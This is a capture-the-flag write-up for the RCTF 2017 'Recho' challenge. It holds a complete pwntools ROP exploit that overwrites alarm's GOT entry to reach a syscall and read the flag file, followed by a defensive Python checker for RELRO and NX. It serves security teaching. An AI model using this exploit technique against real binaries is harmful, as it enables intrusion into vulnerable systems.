Recho
Challenge source: XCTF 3rd-RCTF-2017
Challenge description: none
There is a stack overflow, but the program only reaches its ret once input has ended, so there is a single chance: the whole ROP chain has to be laid out correctly in one payload.
The alarm function contains a syscall instruction at alarm+5, so pointing alarm's GOT entry at alarm+5 turns a call through the PLT into an arbitrary syscall.
The program already contains the string "flag", so an open/read/write (orw) chain is the natural approach.
open is issued through that syscall; read and write both exist in the program itself.
Input can be ended with io.shutdown('send').
The exploit is as follows:
from pwn import *

# io = process('./Recho')
io = remote('111.200.241.244', 52297)
# context.log_level = 'debug'

flag_addr = 0x601058      # the program's own "flag" string
goal_addr = 0x601100      # writable scratch buffer for the file contents
pop_rax = 0x4006fc
add_rdi_rax = 0x40070d    # adds al to the byte at [rdi]
pop_rdi = 0x4008a3
pop_rsi_r15 = 0x4008a1
pop_rdx = 0x4006fe
write_plt = 0x4005D0
read_plt = 0x400600
alarm_got = 0x601028
alarm_plt = 0x4005F0

io.recvuntil(b'Welcome to Recho server!\n')

# 56 bytes of padding up to the saved return address.
# Step 1: add 5 to alarm's GOT entry so it points at the syscall in alarm+5.
payload = b'a' * 56 + p64(pop_rax) + p64(5)
payload += p64(pop_rdi) + p64(alarm_got) + p64(add_rdi_rax)
# Step 2: rax = 2 (SYS_open), rdi = "flag", rsi = 0 (O_RDONLY); call alarm@plt -> syscall.
payload += p64(pop_rax) + p64(2) + p64(pop_rdi) + p64(flag_addr)
payload += p64(pop_rsi_r15) + p64(0) + p64(0) + p64(alarm_plt)
# Step 3: read(3, goal_addr, 100) -- the new file descriptor is 3.
payload += p64(pop_rdi) + p64(3)
payload += p64(pop_rsi_r15) + p64(goal_addr) + p64(0)
payload += p64(pop_rdx) + p64(100) + p64(read_plt)
# Step 4: write(1, goal_addr, 100) to print the file.
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi_r15) + p64(goal_addr) + p64(0)
payload += p64(pop_rdx) + p64(100) + p64(write_plt) + b'\n'

# The program first reads the input length, then the data itself.
io.send(str(len(payload)).encode())
sleep(0.2)
io.send(payload)
io.shutdown('send')   # end input so the function returns into the chain
io.interactive()
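The GOT write in the chain above only works because the binary leaves its GOT writable (partial RELRO rather than full RELRO); with full RELRO the loader resolves every entry at startup and maps the table read-only, and the alarm+5 trick has nothing to overwrite. The checker below is an added example, not part of the original writeup or the challenge files: it parses the program headers and the dynamic section of an ELF64 image and reports the RELRO level and whether the stack is non-executable. The build_elf helper constructs a minimal, non-runnable ELF64 image (headers only) so the checker can be exercised offline; the exact flag values it uses are the standard ones from the ELF and GNU ABI definitions.

```python
import struct

# ELF64 / GNU ABI constants
PT_LOAD, PT_DYNAMIC = 1, 2
PT_GNU_STACK, PT_GNU_RELRO = 0x6474e551, 0x6474e552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_FLAGS, DT_FLAGS_1 = 0, 30, 0x6ffffffb
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1
PHDR_FMT, DYN_FMT = '<IIQQQQQQ', '<qQ'


def elf_mitigations(data):
    """Return {'relro': 'none'|'partial'|'full', 'nx': bool} for an ELF64 image."""
    if data[:4] != b'\x7fELF' or data[4] != 2:
        raise ValueError('not an ELF64 image')
    e_phoff, = struct.unpack_from('<Q', data, 32)
    e_phentsize, e_phnum = struct.unpack_from('<HH', data, 54)
    has_relro, dynamic, gnu_stack = False, None, None
    for i in range(e_phnum):
        p_type, p_flags, p_offset, _, _, p_filesz, _, _ = struct.unpack_from(
            PHDR_FMT, data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            dynamic = (p_offset, p_filesz)
        elif p_type == PT_GNU_STACK:
            gnu_stack = p_flags
    # Without a PT_GNU_STACK header the kernel defaults to an executable stack.
    nx = gnu_stack is not None and not (gnu_stack & PF_X)
    # Full RELRO additionally needs BIND_NOW so no GOT entry is left for lazy binding.
    bind_now = False
    if dynamic:
        off, size = dynamic
        for pos in range(off, off + size, 16):
            tag, val = struct.unpack_from(DYN_FMT, data, pos)
            if tag == DT_NULL:
                break
            if (tag == DT_FLAGS and val & DF_BIND_NOW) or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                bind_now = True
    if has_relro and bind_now:
        relro = 'full'     # GOT resolved at load time, then mapped read-only
    elif has_relro:
        relro = 'partial'  # .got.plt stays writable: lazily bound entries can be overwritten
    else:
        relro = 'none'
    return {'relro': relro, 'nx': nx}


def build_elf(relro=True, bind_now=False, exec_stack=False):
    """Constructed minimal ELF64 image (headers and dynamic section only) for testing."""
    n_ph = 3 + (1 if relro else 0)
    dyn_off = 64 + 56 * n_ph
    dyn = b''
    if bind_now:
        dyn += struct.pack(DYN_FMT, DT_FLAGS, DF_BIND_NOW)
    dyn += struct.pack(DYN_FMT, DT_NULL, 0)

    def phdr(p_type, p_flags, off, size):
        return struct.pack(PHDR_FMT, p_type, p_flags, off, off, off, size, size, 8)

    phdrs = [phdr(PT_LOAD, PF_R | PF_X, 0, dyn_off + len(dyn)),
             phdr(PT_DYNAMIC, PF_R | PF_W, dyn_off, len(dyn)),
             phdr(PT_GNU_STACK, PF_R | PF_W | (PF_X if exec_stack else 0), 0, 0)]
    if relro:
        phdrs.append(phdr(PT_GNU_RELRO, PF_R, dyn_off, len(dyn)))
    ident = b'\x7fELF' + bytes([2, 1, 1, 0]) + b'\0' * 8  # ELF64, little-endian, version 1
    ehdr = ident + struct.pack('<HHIQQQIHHHHHH', 2, 0x3e, 1, 0x400000,
                               64, 0, 0, 64, 56, n_ph, 64, 0, 0)
    return ehdr + b''.join(phdrs) + dyn


if __name__ == '__main__':
    import sys
    # Usage: python3 check.py ./binary   (falls back to the constructed image)
    image = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else build_elf()
    print(elf_mitigations(image))
```

A result of 'partial' (or 'none') is the condition the chain above relies on; the corresponding build-side fix is linking with -Wl,-z,relro,-z,now, which the checker reports as 'full'.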